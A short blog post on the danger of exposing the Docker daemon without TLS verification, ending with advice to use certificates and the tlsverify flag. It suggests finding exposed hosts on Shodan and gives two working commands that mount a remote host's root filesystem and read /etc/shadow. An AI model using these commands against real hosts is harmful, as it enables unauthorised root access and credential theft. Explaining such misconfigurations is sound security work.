Docker is awesome.
Also, it has a lot of security built in, allowing you to fully customize the level of access each container has to other containers or the host, or you can just launch a container with root access to your entire host.. But you would never do such a thing, right?
It all begins and ends with accessing the Docker daemon, since it’s running as root to allow all the magical cgroup/namespaces stuff, whoever has access to it can control your host entirely.
By default, if you set up a host with https://get.docker.com it’ll only listen on a unix socket via /var/run/docker.sock which is sufficient in most cases. If you use docker-machine to launch a host, it’ll enforce two-way TLS verification to strictly control access.
However, searching StackOverflow for help on accessing docker remotely will get you this:
If you check the official Docker docs it’ll tell you to use TLS and enforce two-way verification otherwise you’ll get pwned.
A quick search on Shodan for port 2375 (default for non-TLS Docker) would provide a good amount of hosts to play with, also searching for port 2376 (default TLS enabled Docker) is useful, although you will find some properly configured hosts.
Let’s pop a box. © @ReL1K
# For non-TLS hosts
docker -H docker.host.no.tls:2375 run --rm -v /:/pwn busybox cat /pwn/etc/shadow
# For TLS enabled hosts without --tlsverify
docker -H docker.host.no.tlsverify:2376 --tls run --rm -it -v /:/pwn busybox cat /pwn/etc/shadow
The snippet above launch a busybox container and cat /etc/shadow as a POC you have root access to the host’s filesystem. At this point I’ll leave next steps to your imagination :)
How to Docker responsibly?
Use proper certificates and don’t forget the tlsverify flag to force two-way TLS authentication.